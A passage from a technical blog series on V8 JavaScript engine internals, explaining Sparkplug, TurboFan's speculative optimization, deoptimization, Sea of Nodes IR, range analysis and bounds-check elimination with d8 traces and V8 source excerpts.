Do note that I say β€œalmost 1:1 compatible”, there is one small difference between the Ignition and Sparkplug stack frames. And that difference is that Sparkplug doesn’t need to keep the bytecode offset slot in the register file since Sparkplug code is emitted directly from the bytecode. Instead, it replaces it with the cached feedback vector.

An example of how these two stack frames compare can be seen in the image below - as provided by the Ignition Documentation.

So why does Sparkplug need to creates and maintains a stack frame layout that’s similar to Ignitions? For one reason, and for the main reason of how Sparkplug and Turbofan work, by doing something called on-stack replacement (OSR). OSR is the ability to replace currently executing code with a different version. In this case, when Ignition sees that a JavaScript function is used a lot, it will send it to Sparkplug to speed it up.

Once Sparkplug serializes the bytecodes to their builtins, it will replace the Interpreters stack frame for that specific function. When the stack is walked and executed, the code will jump directly into Sparkplug instead of being executed on Ignitions emulated stack. And since the frames are β€œmirrored”, this technically allows V8 to swap between the interpreter and Sparkplug code with almost zero frame translation overhead.

Before we move on, I just want to point out the security aspect of Sparkplug. In general, there is unlikely to be a security issue in the generated code itself. The bigger security risk with Sparkplug is with how the layout of Ignitions stack frames are interpreted, which can lead to a type confusion or code execution on the stack.

One example of this would be Issue 1179595 which was a potential RCE due to an invalid register count check. There also is a concern in the way Sparkplug does RX/WX bit flipping - but I won’t go into detail as that’s really not important and such bugs don’t play an important role in this overall series.

Okay, so we understand how Ignition and Sparkplug works. Now, it’s time to dive deeper into the compiler pipeline and into understanding the optimizing compiler, TurboFan.

TurboFan

TurboFan is V8’s Just-In-Time (JIT) compiler that combines an interesting immediate representation concept known as the β€œSea of Nodes” with a multi-layered translation and optimization pipeline that helps TurboFan generate better quality machine code from bytecode. To those who were paying attention by reading the code and documentation along the way, you’d know that TurboFan is much more than just a compiler.

TurboFan is actually responsible for the interpreter’s bytecode handlers, builtins, code stubs, and inline cache system via it’s macro assembler! So when I say that TurboFan is the most important part of the compiler pipeline, I wouldn’t be kidding.

So, how do these optimizing compilers, like TurboFan work?

Well optimizing compilers work via something called a β€œprofiler” - which we briefly mentioned in Part 1. In essence, this profiler works ahead of time by watching for code that should be optimized (we refer to this code or JavaScript function as being β€œhot”). It does this by collecting metadata and β€œsamples” from JavaScript functions and the stack by looking at the information collected by inline caches and the feedback vector.

The compiler then builds an intermediate representation (IR) data structure which is used to produce optimized code. This whole process of watching the code and then compiling machine code is called Just-in-Time or JIT compilation.

Just-In-Time Compilation (JIT)

As we know, the execution of bytecode in the interpreter VM is slower than assembly execution on the native machine. Reason for this is because JavaScript is dynamic and there is a lot of overhead for property lookups, checking of objects, values, etc. and we’re also running on an emulated stack.

Of course, Maps and Incline Caching (IC) help solve some of these overheads by speeding up dynamic lookup of properties, objects, and values - but they still can’t deliver peak performance. The reason for that is because each IC acts on its own, and it has no knowledge or concept about its neighbors.

Take Maps for example, if we add a property to a known shape, we still have to follow the transitions table and look up or add additional shapes. If we have to do this many times over and over again for a specific function or object, even with a known shape, we’re pretty much wasting computational cycles by doing this time and time again.

So, when there is a JavaScript function that is executed a lot of times, it might be worth spending the time to pass the function into the compiler and compile it down to machine code, allowing it to be executed much faster.

For example, let’s take this code:

function hot_function(obj) {
	return obj.x;
}

for (let i=0; i < 10000; i++) {
	hot_function({x:i});
}

The hot_function simply takes in an object and returns the value of property x. Next, we execute that function approximately 10k times and for each object we just pass a new integer for property x. In this case, because the function is used a lot of times and the general shape of the object doesn’t change, V8 might decide that it’s better to just pass it up the pipeline (known as a β€œtier-up”) for compilation so that it’s executed faster.

We can see this in actions within d8 by tracing the optimization with the --trace-opt flag. So, let’s do just that, and also, tack on the --allow-natives-syntax command so we can explore how the functions code looks like before and after optimization.

We’ll start by launching d8 and then setting up our function. Afterwards, use the %DisassembleFunction against hot_function to see its type. You should get something similar.

d8> function hot_function(obj) {return obj.x;}
d8> %DisassembleFunction(hot_function)
0000027B0020B31D: [CodeDataContainer] in OldSpace
 - map: 0x027b00002a71 <Map[32](CODE_DATA_CONTAINER_TYPE)>
 - kind: BUILTIN
 - builtin: InterpreterEntryTrampoline
 - is_off_heap_trampoline: 1
 - code: 0
 - code_entry_point: 00007FFCFF5875C0
 - kind_specific_flags: 0

As you can see, initially this code object will be executed by Ignition since it’s a BUILTIN and will be handled by the InterpreterEntryTrampoline as we know. Now, if we execute this function 10k times, we will see it be optimized by TurboFan.

d8> for (let i=0; i < 10000; i++) {hot_function({x:i});}
[marking 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> for optimization to TURBOFAN, ConcurrencyMode::kConcurrent, reason: small function]
[compiling method 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> (target TURBOFAN) OSR, mode: ConcurrencyMode::kConcurrent]
[completed compiling 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> (target TURBOFAN) OSR - took 1.691, 81.595, 2.983 ms]
[completed optimizing 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> (target TURBOFAN) OSR]
9999

As you can see, TurboFan kicks in and starts compiling the function for optimization. Take note of a few key points in the optimization trace. As you can see in line one of the opt trace, we are marking the JSFunction’s SFI or SharedFunctionInfo for optimization.

If you remember back to our Ignition deep dive, you’ll remember that the SFI contains the bytecode for our function. TurboFan will use that bytecode to generate IR and then optimize it down to machine code.

Now, if you look further down, you’ll see a mention of OSR or on-stack replacement. Pretty much TurboFan does the same thing Sparkplug does when it optimizes bytecode. It will replace the stack frame with a real JIT or system stack frame that will point to the optimized code during runtime. This allows the function to go directly to the optimized code the next time it is called, versus being executed within Ignitions emulated stack.

If we run %DisassembleFunction against our hot_function again, we should see that it is now optimized and the code entry point in the SharedFunctionInfo will point to optimized machine code.

d8> %DisassembleFunction(hot_function)
0000027B0025B2B5: [CodeDataContainer] in OldSpace
 - map: 0x027b00002a71 <Map[32](CODE_DATA_CONTAINER_TYPE)>
 - kind: TURBOFAN
 - is_off_heap_trampoline: 0
 - code: 0x7ffce0004241 <Code TURBOFAN>
 - code_entry_point: 00007FFCE0004280
 - kind_specific_flags: 4

To those with a keen eye, you might have noticed something interesting when we traced the optimization of our function. If you paid close attention, you would have noticed that TurboFan didn’t kick in right away, but after a few seconds - or after a few thousand iterations of the loop. Why is that?

The reason this happens is because TurboFan waits for the code to β€œwarm up”. If you remember back to our discussion about Ignition and Sparkplug, we briefly mentioned the feedback vector. This vector stores the object runtime data along with information from the inline caches and collects what is known as type feedback.

This is critical for TurboFan because as we know, JavaScript is dynamic and there is no way for us to store static type information. Second of all, we don’t know the type of a value till runtime. The JIT compiler actually has to make educated guesses about the usage and behavior of the code it’s compiling, such as what your function type is, the type of variables that are being passed in, etc. In essence the compiler makes a lot of assumptions or β€œspeculations”.

This is why optimizing compilers look at the information collected by incline caches and use the feedback vector to help make informed decisions on what it needs to do with the code to make it fast. This is known as Speculative Optimization.

Speculative Optimization and Type Guards

So how does speculative optimization help us turn our JavaScript code into highly optimized machine code? Well to help explain that, let’s start with an example.

Let’s say we have a simple evaluation for a function called add, such as return 1 + i. Here we are returning a value by adding 1 to i. Without knowing what type i is, we need to follow the ECMAScript standard implementation for the runtime semantic of EvaluateStringOrNumericBinaryExpression.

As you can see, once we evaluate the left and right references, and call GetValue on both the left and right values of our operand, we then need to follow the ECMAScript standard to ApplyStringOrNumericBinaryOperator so we can return our value.

If it’s not already obvious to you, without knowing the type of variable i is, be it an integer or string, there is no way we can implement this whole evaluation in just a few machine instructions, and nonetheless have it be fast.

This is where the speculative optimization comes in, where TurboFan will rely on the feedback vector to make its assumptions about the possible types that i is.

For example, if after a few hundred runs we look at the feedback vector for the Add bytecode, and know that i is a number, then we don’t have to handle the ToString or even the ToPrimitive evaluations. In that case, the optimizer can take an IR instruction and claim that i and the return value are just numbers and load it as such. Which minimizes the amount of machine instructions we need to generate.

So how do these feedback vectors look like in the case of our function?

Well, If you remember back to the mention of the JSFunction object or closure, you’ll remember that the closure linked us to the feedback vector slot as well as the SharedFunctionInfo. Within the feedback vector, there is an interesting slot called the BinaryOp slot, which records feedback about the inputs and outputs of binary operations such as +, -, *, etc.

We can check what’s inside our feedback vector and see this specific slot by running %DebugPrint against our add function. Your output should be similar to mines.

d8> function add(i) {return 1 + i;}
d8> for (let i=0; i<100; i++) {add(i);}
d8> %DebugPrint(add)
DebugPrint: 0000019A002596F1: [Function] in OldSpace
 - map: 0x019a00243fa1 <Map[32](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x019a00243ec9 <JSFunction (sfi = 0000019A0020AA45)>
 - elements: 0x019a00002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype:
 - initial_map:
 - shared_info: 0x019a0025962d <SharedFunctionInfo add>
 - name: 0x019a00005809 <String[3]: #add>
 - builtin: InterpreterEntryTrampoline
 - formal_parameter_count: 1
 - kind: NormalFunction
 - context: 0x019a00243881 <NativeContext[273]>
 - code: 0x019a0020b31d <CodeDataContainer BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x019a0025a89d <BytecodeArray[9]>
 - source code: (i) {return 1 + i;}
 - properties: 0x019a00002259 <FixedArray[0]>
   ...
 - feedback vector: 0000019A0025B759: [FeedbackVector] in OldSpace
 - map: 0x019a0000273d <Map(FEEDBACK_VECTOR_TYPE)>
 - length: 1
 - shared function info: 0x019a0025962d <SharedFunctionInfo add>
 - no optimized code
 - tiering state: TieringState::kNone
 - maybe has maglev code: 0
 - maybe has turbofan code: 0
 - invocation count: 97
 - profiler ticks: 0
 - closure feedback cell array: 0000019A00003511: [ClosureFeedbackCellArray] in ReadOnlySpace
 - map: 0x019a00002981 <Map(CLOSURE_FEEDBACK_CELL_ARRAY_TYPE)>
 - length: 0

 - slot #0 BinaryOp BinaryOp:SignedSmall {
     [0]: 1
  }
   ...

There are a few interesting items in here. Invocation count shows us the number of times we ran the add function, and if we look into our feedback vector, you’ll see that we have exactly one slot, which is the BinaryOp that we talked about. Looking into that slot we see that it contains the current feedback type of SignedSmall which in essence refers to an SMI.

Remember, this feedback information is not interpreted by V8 but by TurboFan, and as we know, an SMI is a signed 32bit value as we explained during the pointer tagging portion in Part 1 of this series.

Overall, these speculations via feedback vectors are great in helping speed up our code by removing unnecessary machine instructions for different types. Unfortunately, it’s pretty unsafe to just apply instructions solely focused around one type to dynamic objects.

So, what happens if halfway during the optimized function we pass in a string instead of a number? In essence, if this was to happen then we would have a type confusion vulnerability on our hands. To protect against potentially wrong assumptions, TurboFan prepends something known as a type guard before execution of specific instructions.

This type guard checks to make sure that the shape of the object we are passing in is the correct type. This is done before the object reaches our optimized operations. If the object does not match the expected shape, then the execution of the optimized code can’t continue. In that case, we will β€œbail out” of the assembly code, and jump back to the unoptimized bytecode within the interpreter and continue execution there. This is known as β€œdeoptimization”.

An example of a type guard and jump to deoptimization in the optimized assembly code can be seen below.

REX.W movq rcx,[rbp-0x38]       ; Move i to rcx
testb rcx,0x1                   ; Check if rcx is an SMI
jnz 00007FFB0000422A  <+0x1ea>  ; If check fails, bailout

Now deoptimizations due to type guards aren’t just limited in checking if there is a mismatch in object types. They also work on arithmetic operations and bound checking.

For example, if our optimized code was optimized for arithmetic operations on 32bit integers, and there is an overflow, we can deoptimize and let Ignition handle the calculations - thus protecting us from potential security issues on the machine. Such issues that can lead to deoptimization are known as β€œside-effects” (which we’ll cover in more detail later).

As with the optimization process, we can also see deoptimization in action within d8 by utilizing the --trace-deopt flag. Once done, let’s re-add our add function and run the following loop.

for (let i=0; i<10000; i++) {
	if (i<7000) {
		add(i);
	} else {
		add("string");
	}
}

This simply will let the function be optimized for numbers, and then after 7k iterations, we’ll start passing in a string - which should trigger a bail out. Your output should be similar to mines.

d8> function add(i) {return 1 + i;}
d8> for (let i=0; i<10000; i++) {if (i<7000) {add(i);} else {add("string");}}
[marking 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> for optimization to TURBOFAN, ConcurrencyMode::kConcurrent, reason: small function]
[compiling method 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR, mode: ConcurrencyMode::kConcurrent]
[completed compiling 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR - took 1.987, 70.704, 2.731 ms]
[completed optimizing 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR]
[bailout (kind: deopt-eager, reason: Insufficient type feedback for call): begin. deoptimizing 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)>, 0x7ffb00004001 <Code TURBOFAN>, opt id 0, node id 63, bytecode offset 40, deopt exit 3, FP to SP delta 96, caller SP 0x00ea459fe250, pc 0x7ffb00004274]
[compiling method 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR, mode: ConcurrencyMode::kConcurrent]
[completed compiling 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR - took 0.325, 121.591, 1.425 ms]
[completed optimizing 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR]
"1string"

As you can see, the functions gets optimized, and later we trigger a bailout. This deoptimizes the code back to bytecode due to an insufficient type during our call. Then, something interesting happens. The function gets optimized again. Why?

Well, the function is still β€œhot” and there are a few more thousand iterations to go. What TurboFan will do, now that it collected both a number and string within the type feedback, is that it will go back and optimize the code for a second time. But this time it will add code which will allow for string evaluation. In this case, a second type guard will be added - so the second run of code is now optimized for both a number and a string!

A good example and explanation of this can be seen in the video β€œInside V8: The choreography of Ignition and TurboFan”.

We can also see this updated feedback in the BinaryOp slot by running the %DebugPrint command against our add function. You should see something similar as below.

d8> %DebugPrint(add)
DebugPrint: 000003E20025970D: [Function] in OldSpace
 - map: 0x03e200243fa1 <Map[32](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x03e200243ec9 <JSFunction (sfi = 000003E20020AA45)>
 - elements: 0x03e200002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype:
 - initial_map:
 - shared_info: 0x03e20025962d <SharedFunctionInfo add>
 - name: 0x03e200005809 <String[3]: #add>
 - builtin: InterpreterEntryTrampoline
 - formal_parameter_count: 1
 - kind: NormalFunction
 - context: 0x03e200243881 <NativeContext[273]>
 - code: 0x03e20020b31d <CodeDataContainer BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x03e20025aca5 <BytecodeArray[9]>
 - source code: (i) {return 1 + i;}
 - properties: 0x03e200002259 <FixedArray[0]>
   ...
 - feedback vector: 000003E20025ACF1: [FeedbackVector] in OldSpace
 - map: 0x03e20000273d <Map(FEEDBACK_VECTOR_TYPE)>
 - length: 1
 - shared function info: 0x03e20025962d <SharedFunctionInfo add>
 - no optimized code
 - tiering state: TieringState::kNone
 - maybe has maglev code: 0
 - maybe has turbofan code: 0
 - invocation count: 5623
 - profiler ticks: 0
 - closure feedback cell array: 000003E200003511: [ClosureFeedbackCellArray] in ReadOnlySpace
 - map: 0x03e200002981 <Map(CLOSURE_FEEDBACK_CELL_ARRAY_TYPE)>
 - length: 0

 - slot #0 BinaryOp BinaryOp:Any {
     [0]: 127
  }

As you can see, the BinaryOp now stores the feedback type of Any, instead of SignedSmall and String. Why? Well, this is due to something called the Feedback Lattice.

Feedback Lattice

The feedback lattice stores the possible feedback states for an operation. It starts with None, which indicates that it hasn’t seen anything and it goes down toward the Any state, which indicates that it’s seen a combination of inputs and outputs. The Any state indicates that the function is to be considered polymorphic, while in contrast, any other state indicates that the function is monomorphic - since it’s only produced a certain value.

If you would like to learn more about the difference between monomorphic and polymorphic code, I highly suggest you read the fantastic article β€œWhat’s up with Monomorphism?”.

Below, I have provided you a visual example of what the feedback lattice roughly looks like.

Just like the array lattice from Part 1, this lattice works the same way. Feedback can only progress downwards in the lattice. Once we go from Number to Any, we can never go back. If we do go back for some magic reason, then we risk entering a so-called deoptimization loop where the optimizing compiler consumes invalid feedback and bails out from optimized code continuously.

You can see more information on the type checks within the v8/src/compiler/use-info.h file. Also, if you want to learn more about V8’s feedback system and inline cache, I suggest watching β€œV8 and How It Listens to You - Michael Stanton”.

β€œSea of Nodes” Intermediate Representation (IR)

Now that we know how type feedback is collected for TurboFan to make its speculative assumptions, let’s see how TurboFan builds its specialized IR from this feedback. The reason that IR is generated is due to the fact that this data structure abstracts from code complexity, which in turn makes it easier to preform compiler optimizations.

Now, TurboFans β€œSea of Nodes” IR is based on static single assignment or SSA, which is a property of IR that requires each variable to be assigned exactly once and defined before it is used. This is useful for optimizations such as redundancy elimination.

An example of SSA for our add function from our previous example can be seen below.

// function add(i) {return 1 + i;}
var i1 = argument
var r1 = 1 + i1
return r1

This SSA form is then converted to a graph format, which is similar to a control-flow graph (CFG) where it uses nodes and edges to represent code and its dependencies between computations. This type of graph form allows TurboFan to utilize it for both data-flow analysis and machine code generation.

So, let’s see how this Sea of Nodes looks like. We’ll use our hot_function example for this. Start by creating a new JavaScript file and add the following to it.

function hot_function(obj) {
	return obj.x;
}

for (let i=0; i < 10000; i++) {
	hot_function({x:i});
}

Once done, we will run this script via d8 with the --trace-turbo flag which allows us to trace and save the IR generated by TurboFans JIT. Your output should look similar to mines. At the end of the run, it should generate a JSON file that has the naming convention of turbo-*.json.

C:\dev\v8\v8\out\x64.debug>d8 --trace-turbo hot_function.js
Concurrent recompilation has been disabled for tracing.
---------------------------------------------------
Begin compiling method add using TurboFan
---------------------------------------------------
Finished compiling method add using TurboFan

After that’s completed, navigate to Turbolizer in a web browser, press CTRL + L and load your JSON file. This tool will help us visualize the sea of nodes graph generated by TurboFan.

The graph you see should pretty much be identical to mines.

In Turbolizer, on the left you’ll see your source code, and the right side (not shown in image) you’ll have the optimized machine code that was generated by TurboFan. In the middle you will have the sea of nodes graph.

Currently there are a lot of the nodes hidden and only the control nodes are shown, which is the default behavior. If you click on the β€œShow All Nodes” box to the right of the β€œrefresh” symbol, you’ll see all the nodes.

By messing around in Turbolizer and viewing the graph you’ll notice that there are five different colors of nodes and they represent the following:

  • Yellow: These nodes represent control nodes, meaning anything that can change the β€œflow” of the script - such as an if/else statement.
  • Light Blue: These nodes represent a value a certain node can have or return, such as heap constants or inlined values.
  • Red: Represents semantics of JavaScript’s overloaded operators, such as any action that is executed at the JavaScript level, i.e., JSCall, JSAdd, etc. These resemble bytecode operations.
  • Blue: Express VM-level operations, such as allocations, bound checks, loading data off stack, etc. This is helpful in tracking feedback being consumed by Turbofan.
  • Green: These correspond to single machine level instructions.

As we can see, each node within this Sea of Nodes can represent arithmetic operations, loads, stores, calls, constants, etc. Then there are three edges (represented by the arrows between each node) that we need to know about which express dependencies. These edges are:

  • Control: Just like in a CFG, these edges enable branches and loops.
  • Value: Just like in Data Flow Graphs, these show value dependencies and output.
  • Effect: Detail order operations such as reading or writing states.

With that knowledge, let’s expand the graph a little bit and look at a few of the other nodes to understand how the flow works. Take note that I have hidden a few select nodes that aren’t really important.

As we can see, the Yellow colored nodes are control nodes which manage the flow of the function. Initially we have the Loop node which tells us that we are going into a loop. From there the control edges points to the Branch and LoopExit nodes. The Branch is exactly what it means, it β€œbranches” the loop into a True/False statement.

If we follow the Branch node up, we will see that it has a SpeculativeNumberLessThan node which has a value edge pointing to a NumberConstant with the value of 10000. This falls in line with our function, since we were looping 10k times. Since this node is Green, it is a machine instruction, and signifies our type guard for the loop.

You can see from the SpeculativeNumberLessThan node that there is an effect edge pointing to LoopExitEffect, which means that if the number is more then 10k, we exit the loop, because we just broke the assumption.

While the value is under 10k and the SpeculativeNumberLessThan is true, we will load our object, and call JSDefineNamedOwnProperty which will get the objects offset to property x. Then we call JSCall to add 1 to our property value and return the value. From that node we also have an effect edge going to SpeculativeSafeIntegerAdd. This node has a value edge pointing to a NumberConstant node that has the value of 1, which is the mathematical addition we are doing when we return the value.

Again note that we have a SpeculativeSafeIntegerAdd node that checks to make sure that the addition arithmetic we are doing is indeed adding an SMI and not something else, otherwise it would trigger the type guard and deoptimize.

For those that might be wondering what the Phi node is, that’s basically an SSA node that merges the two (or more) possibilities for a value that have been computed by different branches. In this case it’s merging both of the potential integer speculations together.

As you can see, understanding these graphs isn’t too complex once you understand the basics.

Now, if you look at the top left portion of the sea of nodes window, you’ll see that we are in the V8.TFBytecodeGraphBuilder option. This option shows us the generated IR from bytecode without any optimizations applied to it. From the drop-down menu we can select the other different optimization passes that this code goes through to view the associated IR.

Common Optimizations

Alright, now that we covered TurboFans Sea of Nodes, we should have at least a decent understanding of how to navigate and understand the generated IR. From here we can dive into understanding some of TurboFans common optimizations. These optimizations in essence act on the original graph that was produce from bytecode.

Since the resulting graph now has static type information due to type guards, the optimizations are done in a more classic ahead-of-time fashion to improve the execution speed or memory footprint of the code. Afterwards, once the graph is optimized, the resulting graph is lowered to machine code (known as β€œlowering”) and is then written into an executable memory region for V8 to execute when the compiled function is called.

One thing to note, is that lowering can happen in multiple stages with further optimizations in between, making this compiler pipeline pretty flexible.

With that being said, let’s look into a few of these common optimizations.

Typer

One of the earliest optimization phases is called the TyperPhase which is ran by the OptimizeGraph function. This phase traces through the code and identifies the resulting types of operations from heap objects, such as Int32 + Int32 = Int32.

When Typer runs it will visit every node of the graph and will try to β€œreduce” them down by trying to simplify operation logic. It will then call the node’s associated typer call to associate a Type with it.

For example, in our case the constant integers within the loop and return arithmetic will be visited by Typer::Visitor::TypeNumberConstant, which will return a type of Range - as can be seen by the code example from v8/src/compiler/types.cc.

Type Type::Constant(double value, Zone* zone) {
  if (RangeType::IsInteger(value)) {
    return Range(value, value, zone);
  } else if (IsMinusZero(value)) {
    return Type::MinusZero();
  } else if (std::isnan(value)) {
    return Type::NaN();
  }

Now what about our speculation nodes?

For those, they are handled by the OperationTyper. In our case, the arithmetic speculation for returning our value will call OperationTyper::SpeculativeSafeIntegerAdd which will set the type to a β€œsafe integer” range, such as Int64. This type will be checked, and if it’s not an Int64 during execution, we deoptimize. This in essence allows for arithmetic operations to have positive and negative return value and it prevents potential over/underflow issues.

Knowing this, let’s take a look at the V8.TFTyper optimization phase to see the graph and the nodes associated types.

Range Analysis

During the Typer optimization the compiler traces through the code, identifies the range of operations and calculates the bounds of the resulting values. This is known as range analysis.

If you noticed in the graph above, we encountered the Range type, especially for the SpeculativeSafeIntegerAdd node which had the range of an Int64 variable. The reason this was done is because the range analysis optimizer computes the min and max of values that are added or returned.

In our case, we were returning the value of i from our object’s property of x plus 1. The type feedback only really knew that the value returned is an integer and that’s it, it never really could tell what range the value would be. So, to err on the safe side, it decided to give it the largest value possible in order to prevent issues.

So, let’s take another look at this range analysis by considering the following code:

function hot_function(obj) {
	let values = [0,13,1337]
	let a = 1;
	if (obj == "leet")
		a = 2;
	return values[a];
}

As we can see, depending on what type of obj parameter is passed in, if obj is a string that equals the word leet then a will equal 1337, otherwise it will equal 13. This part of the code will go through SSA and be merged into a Phi node that will contain the range of what a can be. The constants will have their range set to their hardcoded value, but these constants will also have an effect on our speculative ranges due to arithmetic computations.

If we were to look at the graph produced from this code after range analysis, we should see the following.

As you can see, due to SSA we have the Phi node. During range analysis the typer visits the TypePhi node function and creates a union of the operands 13 and 1337, allowing us to have the possible range for a.

For the speculative nodes, the OperationTyper calls the AddRanger function which computes the min and max bounds for the Range type. In this case you can see that the typer computes the range of our return values for both possible iteration of a after our arithmetic operations.

With this, in the case that the range analysis fails and we get a value not expected by the compiler, we deoptimize. Pretty simple to understand!

Bounds Checking Elimination (BCE)

Another common optimization that was applied with the Typer during the simplified lowering phase was the CheckBounds operation which is applied to CheckBound speculative nodes. This optimization is usually applied to array access operations if the index of the array has been proven to be within the bounds of the array after range analysis.

The reason I say β€œwas” is due to the fact that the Chromium team has decided to disable this optimization in order to harden TurboFan’s bounds check against typer bugs. There are some β€œbugs” that will allow you to get around the hardening, but I won’t get into that. If you want to learn more about those bugs then I suggest reading β€œCircumventing Chrome’s Hardening of Typer Bugs”.

Either way, let’s demonstrate how this type of optimization would have worked by taking the following code for example:

function hot_function(obj) {
	let values = [0,13,1337]
	let a = 1;
	if (obj == "leet")
		a = 2;
	return values[a];
}

As you can see, this is pretty much similar to the code we used in our range analysis. We again accept a parameter to our hot_function and if the object matches a string of β€œleet” we set a to 2 and return the value of 1337, otherwise we set a to 1 and return the value of 13.

Particularly take note that a never equals 0, so we’ll never or at least should never be able to return 0. This creates an interesting case for us when we look at the graph. So, let’s look at the escape analysis portion of the IR and see how our graph looks like.

As you can see, we have another Phi node that merges our potential values of a and then we have our CheckBounds node which is used to check the bounds of the array. If we are in range of 1 or 2, we call LoadElement to load our element from the array, otherwise we will bailout since the bounds check is not expecting an index of 0.

For those that have noticed it already, you might be wondering why our LoadElement is of type Signed31 and not a Signed32. Simply, Signed31 represents the fact that the first bit is used to denote sign. This means that, in the case of a 32-bit signed integer, we are actually working with 31 value bits instead of 32. Also, as we can see the LoadElement has an input of a FixedArray HeapConstant with a length of 3. This array would be our values array.

Once escape analysis has been conducted, we move onto the simplified lowering phase. This lowering phase simply (pun intended) changes all value representations to the correct machine representation, as dictated by the machine operators themselves. The code for this phase is located within v8/src/compiler/simplified-lowering.cc. It is within this phase that bounds checking elimination is conducted.

So how does the compiler decide to make a CheckBounds node redundant?

Well, for each CheckBounds node the VisitCheckBounds function is going to be called. This function is responsible for checking and making sure that the index’s minimum range is equal to or greater than zero and that it’s maximum range does not exceed the array length. If the check is true, then it triggers a DeferReplacement which marks the node for removal.

An example of the VisitCheckBounds function before the hardening commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5 can be seen below.

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckParameters const& p = CheckParametersOf(node->op());
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));
    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32OrMinusZero())) {
        // Map -0 to 0, and the values in the [-2^31,-1] range to the
        // [2^31,2^32-1] range, which will be considered out-of-bounds
        // as well, because the {length_type} is limited to Unsigned31.
        VisitBinop(node, UseInfo::TruncatingWord32(),
                   MachineRepresentation::kWord32);
        if (lower()) {
          if (lowering->poisoning_level_ ==
                  PoisoningMitigationLevel::kDontPoison &&
              (index_type.IsNone() || length_type.IsNone() ||
               (index_type.Min() >= 0.0 &&
                index_type.Max() < length_type.Min()))) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            DeferReplacement(node, node->InputAt(0)); // <= Removes Nodes
          } else {
            NodeProperties::ChangeOp(
                node, simplified()->CheckedUint32Bounds(p.feedback()));
          }
        }
      ...
  }

As you can see our CheckBound range would fall into the if statement, where Range(1,2).Min() >= 0 and Range(1,2).Max() < 3. In that case our node #46 from the above graph would be made redundant and removed.

Now, if you look at the updated code after the commit, you will see a slight change. The call to DeferReplacement has been removed and instead we replace the node with a CheckedUint32Bounds node. If the check fails, TurboFan calls kAbortOnOutOfBounds which aborts the bound check and crashes instead of deoptimizing.

The new code can be seen below:

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckBoundsParameters const& p = CheckBoundsParametersOf(node->op());
    FeedbackSource const& feedback = p.check_parameters().feedback();
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));

    // Conversions, if requested and needed, will be handled by the
    // representation changer, not by the lower-level Checked*Bounds operators.
    CheckBoundsFlags new_flags =
        p.flags().without(CheckBoundsFlag::kConvertStringAndMinusZero);

    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32()) ||
          (index_type.Is(Type::Integral32OrMinusZero()) &&
           p.flags() & CheckBoundsFlag::kConvertStringAndMinusZero)) {
        // Map the values in the [-2^31,-1] range to the [2^31,2^32-1] range,
        // which will be considered out-of-bounds because the {length_type} is
        // limited to Unsigned31. This also converts -0 to 0.
        VisitBinop<T>(node, UseInfo::TruncatingWord32(),
                      MachineRepresentation::kWord32);
        if (lower<T>()) {
          if (index_type.IsNone() || length_type.IsNone() ||
              (index_type.Min() >= 0.0 &&
               index_type.Max() < length_type.Min())) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            // TODO(neis): Move this into TypedOptimization?
            new_flags |= CheckBoundsFlag::kAbortOnOutOfBounds; // <= Abort & Crash
          }
          ChangeOp(node,
                   simplified()->CheckedUint32Bounds(feedback, new_flags)); // <= Replace Node
        }
      ...
  }

If we look at the simplified lowering portion of the graph, we can indeed see that the CheckBounds node has now been replaced with a CheckedUint32Bounds node as per the code and all other nodes had their values β€œlowered” to machine code representation.

Redundancy Elimination

Another popular class of optimizations that is similar to the BCE, is called redundancy elimination. The code for this is located within v8/src/compiler/redundancy-elimination.cc and is responsible for removing redundant type checks. The RedundancyElimination class is essentially a graph reducer that tries to either remove or combine redundant checks in the effect chain.

The effect chain is pretty much the order of operations between effect edges for load and store functions. For example, if we try to load a property from an object and try to add to it, such as obj[x] = obj[x] + 1 then our effect chain would be JSLoadNamed => SpeculativeSafeIntegerAdd => JSStoreNamed. TurboFan has to make sure that these nodes external effects aren’t reordered or otherwise we might have improper guards in place.

A reducer, as detailed in v8/src/compiler/graph-reducer.h, tries to simplify a given node based on its operator and inputs. There are few type of reducers such as constant folding, where if we add two constants with each other, we’ll fold them over to just one, i.e. 3 + 5 will now just be a single constant node of 8, and strength reduction where if a value is added to a node with no effects, we’ll keep a single node, i.e. x + 0 will just have the node x.

We can trace these types of reductions with the --trace_turbo_reduction flag. If we were to run our hot_function again from above with that flag, you should see output as such.

C:\dev\v8\v8\out\x64.debug>d8 --trace_turbo_reduction hot_function.js
- Replacement of #12: Parameter[-1, debug name: %closure](0) with #41: HeapConstant[0x00c800259781 <JSFunction hot_function (sfi = 000000C800259679)>] by reducer JSContextSpecialization
